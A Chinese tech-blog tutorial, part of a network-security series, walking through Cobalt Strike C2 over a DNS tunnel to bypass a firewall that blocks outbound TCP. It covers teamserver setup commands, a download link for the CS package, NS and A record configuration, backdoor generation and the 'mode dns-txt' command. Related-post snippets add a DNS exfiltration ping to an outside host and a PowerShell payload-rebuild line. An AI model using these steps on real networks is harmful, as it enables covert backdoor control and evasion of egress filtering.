网络安全技术之内网安全-05-DNS隧道

最新推荐文章于 2024-07-23 23:50:48 发布
最新推荐文章于 2024-07-23 23:50:48 发布
阅读量314 收藏
点赞数
文章标签: 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caigai5424/article/details/131658885
版权

一、简单说明

在前面的博客中,已经实现了ICMP隧道和 SMB隧道,其实,常用的隧道有四种类型:

SMB 协议
ICMP 协议
DNS 协议
SSH 协议

因此,在实际环境中在选择隧道类型之前,必须先进行判断,例如本例中,防火墙禁用了全部的tcp出站数据
在这里插入图片描述
现在通过浏览器访问网站,会发现网站打不开,但是,此时可以ping
在这里插入图片描述
那么在这个时候,就可以用icmp协议进行出网

同样,也可以判断是否可以用dns协议

判断是否可以用dns协议的方法,如果是windows的话,用nslookup,如果有回显的话,就说明可以进行出网。

在这里插入图片描述

注意:关于DNS协议

在进行区域传输的时候,用的是tcp协议
在进行域名解析的时候,用的UDP协议
在这个案例中,禁用了TCP协议,所以DNS进行域名解析是不会受到影响的

二、实现DNS上线

2.1 架构图

在这里插入图片描述

2.2 配置环境

2.2.1 在云主机上安装和启动cs

在这个案例中,在CS中在设置监听器的时候,需要指定一个域名,而且,被攻击主机在执行了后门以后,需要根据DNS解析结果反向链接CS主机,所以,安装CS的主机需要有公网IP。

本例中,使用腾讯云服务器,作为CS的服务端。
本例中,云服务器操作系统是centos7

在linux中安装、启动CS
1)下载cs的安装包

链接:https://pan.baidu.com/s/1MhiIS8btb_7G-dGdUQWJ8A
提取码:a1hm

2)在linux中进行安装

安装过程就两步
1)安装java环境
2)解压cs软件包

# 1) 安装java
yum install java -y

# 2)解压cs软件包
unzip CSAgent-full

# 3)进入解压目录
cd release

# 4)为启动程序赋权
chmod +x teamserver

# 5)启动cs的服务端
nohup ./teaserver 当前云主机IP  123 &

# 6)检查是否启动成功【如果看到了50050端口在运行,CS就启动了】
ss -tnl | grep  50050

2.2.2 本地主机启动cs客户端

双击bat程序,就可以完成启动
在这里插入图片描述
链接cs的服务端
在这里插入图片描述
在这里插入图片描述

2.2.3 配置被攻击主机

这个主机的系统是windows server 2008
这个主机主要能联网就可以了,不需要其他的配置

2.2.4 配置域名解析服务

配置准备的域名是:zzedu.site
需要配置NS记录和A记录

先来添加一个A记录,指向cs的地址
在这里插入图片描述
然后添加ns记录,指向cs这个域名
在这里插入图片描述
此时多了两个记录
在这里插入图片描述

简单说一下原理

首先,NS服务器记录,就是DNS服务器的地址 用户在访问域的时候,需要进行域名解析,而在解析域名的时候,就需要去找DNS服务器
在网络中,用户在需要解析域名的时候,需要首先找DNS地址,也就是找ns1.zzedu.site,但是这个还是一个域名,而不是一个IP,所在就会继续对这个域名进行解析cs.zzedu.site,此时对这个域名解析的时候就用到 A记录,也就会解析到 IP地址,而这个A记录就是CS的IP地址,这样就打通了CS和被攻击主机。

注意:

在cs中,创建监听器的时候,就写ns1.zzedu.site

2.3 生成后门控制目标主机

生成监听器
在这里插入图片描述

生成后门

在被攻击主机执行了后门后,会发现主机上线了,但是是黑色的
在这里插入图片描述
此时,需要在会话中执行一个命令:mode dns-txt
在这里插入图片描述
终于上线成功

zxhksec
关注
广东工业大学《网络安全》期末复习知识点.pdf
03-07
广东工业大学的《网络安全》课程涵盖了网络安全领域中的多个核心知识点和概念。以下是对提供的文档内容中所提到的一些关键知识点的详细介绍。 首先,P2DR模型是一种网络安全模型,它的全称是“Policy、Protection、...
内网隐藏通信隧道技术——DNS隧道
qq_44005305的博客
07-31 1204
在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断。那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应服务器上。
DNS隧道
swordheart的博客
01-24 5069
DNS隧道 原理说明 DNS隧道是一种隐秘隧道,通过将其他协议封装到DNS协议中传输建立通信的方式。因为DNS协议在网络中一种基础必不可少的服务,所以大部分防火墙和入侵检测设备是不会对对DNS流量进行拦截过滤,这就给DNS作为隐蔽通信提供了有力条件,从而可以利用它实现诸如僵尸网络或木马的远程控制通道和对外传输数据等。 DNS隧道运营的原理可以归结为:“如果你不知道,请问别人”。当DNS服务器收到要解析的地址的DNS请求时,服务器开始在其数据库中查找。如果没有找到记录,则服务器向数据库中指定的域发送请求
内网渗透—DNS隧道上线&DNS隧道通讯&SSH隧道&Linux上线CS
最新发布
2301_76227305的博客
07-23 1099
记录一下最近学的隧道知识,虽然DNS隧道上线和通讯我没有复现成功。希望有大佬看到此文章,能指点一二,有偿答谢。
网络安全技术内网安全-04-SMB隧道
caigai5424的博客
07-11 738
SMB(Server Message Block)协议是一种在计算机网络中共享文件、打印机和其他资源的通信协议。它最初由微软开发,用于在局域网中的计算机之间共享文件和资源,445端口运行打印机共享:SMB协议支持打印机的共享,允许用户在网络中使用共享打印机进行打印操作。通过SMB协议,用户可以连接到其他计算机上的共享打印机,并发送打印任务进行打印。文件共享:SMB协议允许计算机之间共享文件和目录。通过SMB协议,用户可以在网络中访问其他计算机上的共享文件夹,并进行文件的读取、写入和管理操作。
一文学会DNS隧道搭建
Jinmindong
03-09 497
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
dnsmap-master.zip
01-06
- **威胁检测**:通过监控DNS流量,DNSMap可以帮助检测潜在的恶意活动,如DNS隧道DNS劫持等。 5. **注意事项与局限性**: - DNSMap可能受到目标DNS服务器的限制,如防扫描机制、速率限制等,可能会影响结果的...
企业网络安全概述.pptx
06-07
企业网络安全概述 技术创新,变革未来 企业网络安全概述全文共23页,当前为第1页。 组建广域网时网络安全是必须考虑的一个重要方面 网络安全包括的内容广泛,涉及方方面面 引入 企业网络安全概述全文共23页,当前为...
某公司网络安全方案.doc
06-08
题目:某公司网络安全方案 随着网络技术的不断发展,网络应用已经遍布各行各业,网络系统的安全问题显得 越来越重要。由此看来,网络安全已经成为网络管理员在网络构建、网络升级与网络日 常管理中的头等大事。 建设...
Windows Server 2008 R2 DNS服务器基本配置
weixin_67020128的博客
08-27 3211
就像拜访朋友要先知道别人家怎么走一样,Internet上当一台主机要访问另外一台主机时,必须首先获知其地址,TCP/IP中的IP地址是由四段以“.”分开的数字组成(此处以IPv4的地址为例,IPv6的地址同理),记起来总是不如名字那么方便,所以,就采用了域名系统来管理名字和IP的对应关系。然后名称填:www,IP地址填我们本机的IP地址:192.168.4,然后勾选创建相关的指针PTR记录,PTR记录就是在反向区域里面创建反向解析的主机,正向就是域名解析为IP,反向就是IP解析为域名。
内网安全-隧道技术&SSH实现通信&DNS上线与通信&CS上线Linux主机
m0_63917373的博客
08-07 1250
内网安全 隧道技术 SSH实现通信 DNS上线与通信 CS上线Linux主机
内网安全隧道技术&SSH&DNS&ICMP&SMB&上线通讯Linux&Mac
今天是几号的博客
03-22 1236
这里禁用了所有tcp端口,依旧可以ping通,以及dns解析成功。直接放到靶机上执行会报错,windows客户端可以直接使用编译好的windows版本,同时需要安装TAP网卡驱动程序。也可以下载OpenVPN,安装时只选择TAP Virtual Ethernet Adapter,安装后服务器上就会多出一块“TAP-Wndows ADApter V9”的网卡
【渗透测试】CS DNS上线(DoH隧道+CS特征隐藏)
SunnyCat
02-16 6228
目录一、准备工作二、域名设置三、CS上线(DoH)四、流量分析 一、准备工作 1)域名 2)vps(53端口) 3)Cobalt Strike 4.3 二、域名设置 1)获得免费域名 https://www.freenom.com/ 选择域名–>注册邮箱–>登录邮箱完成域名获取 2)自定义域名的dns服务提供商(dns服务器) 这里可以在freenom网站上登录之前创建的账号,点击services–My Domians Management Tools–>nemeservers–>
dns隧道上线
qq_31812157的博客
05-20 117
输入checkin 然后mode dns 或者 mode dns-txt 命令来让Ghost beacon 变成alive beacon。也适用于没有网的主机。但是自定义的dns可以出网的情况。注意建立时间比较长,不是马上输入就有。一个填NS记录,一个填A记录。生成stageless。vps要开启53端口。设置一个A和NS记录。
内网渗透——SMB隧道搭建
m0_65544268的博客
07-12 556
主机3和主机4上都有防火墙,所以正向反向链接都无法使主机4上线,这个时候我们就可以搭建SMB隧道去正向链接主机4。Payload选择Beacon TCP,因为本次使用的是反向链接,正向链接是直接链接不到的。因为主机3上有防火墙,采取正向链接不可行,所以我们可以在主机2上开启转发上线功能。想要入侵到主机4,需要在主机3和主机4之间搭建SMB隧道进行正向链接。的payload,之后将生成好的后门文件传到主机3上。这个步骤是让主机2作为代理监听主机3的上线。3)主机3运行后门文件,主机3上线。
DNS出网机器的艰难上线
安于心,修于形
01-08 431
powershell -command “Get-Content shell.txt -Encoding Byte -ReadCount 0 | Set-Content shell.exe -Encoding Byte” #生成shell.exe文件。通过ping %os%.xxxxxe4b.log.ofux.top.命令,发现虽然显示连接超时,不过dns这边已经接收到了DNS记录,DNS出网,但不完全出网。#6是93756e4b.log.ofux.top. 点加2。CS对话执行mode dns
"高性能加密隧道 ssf1:全平台最新解密技术
这种技术可以在局域网内或跨网络环境下实现端口的转发和穿透,为网络安全和数据传输提供了更加高效和安全的保障。同时,通过 ssf 和边界机器的结合,可以实现网络流量的加密传输,防止被窃听和篡改,保障数据的安全...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值